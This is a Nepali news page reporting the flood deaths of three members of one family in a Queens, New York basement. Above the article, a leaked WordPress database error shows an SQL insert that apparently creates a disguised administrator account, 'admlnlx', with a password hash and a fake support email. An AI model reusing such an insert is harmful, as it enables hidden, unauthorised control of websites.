WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0MWY3Bu7s/Tbbi8TuBaJtoKXFxnX0/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 11:07:03', '', 'admlnlx', 'admlnlx')
न्युयोर्कमा बुधाबार अचानक परेको मुसालधारे बर्षातको कारण सोलुदुधकुण्ड नगरपालिका २ जुनबेसीका एकै परिवारका तीनजना नेपालीको मृत्यु भएको परिवारिक श्रोतले जनाएको छ । मृत्यु हुनेमा ४९ बर्षिय आङ गेलु लामा २० बर्षिय श्रीमति मिङमा याङजी शेर्पा र १९ महिनाको छोरा लोप्साङ लामा रहेका छन । उनीहरु न्युयोर्कको क्विन्सस्थित उडसाइड स्थित सिक्सटि फोर स्ट्रीट फोरको बेस म्यानमा बस्दै आएका थिए ।
लामा परिवारको मृत्यु लगतै सुरक्षा निकायले विहानै उनीहरुको सव व्यवस्थापन गरि छानवीन प्रक्रिया अगाडी बडाइरहेको पारिवारिक श्रोतले जनाएको छ । मृतक लामा विगत १४ बर्षदेखिन न्युयोर्कमा बसोबास गदै आइरहेका छन ।
आफनो समुदायको एकै परिवारको ३ जनाको ज्यान गएको अकल्पनिय घटनाले निकै दुखित तुल्याएको शेर्पा किदुगको अध्यक्ष छिरिङ शेर्पाले बताए । मृतक लामाको परिवारको दुखद निधनप्रति शेर्पा किदुगले हार्दिक श्रद्दाञ्जलीसंगै उहाको परिवारलाई चाहिने आवश्याक सहयोग गर्ने अध्यक्ष शेर्पाले बताइन । साभारः एभेष्ट टाईमस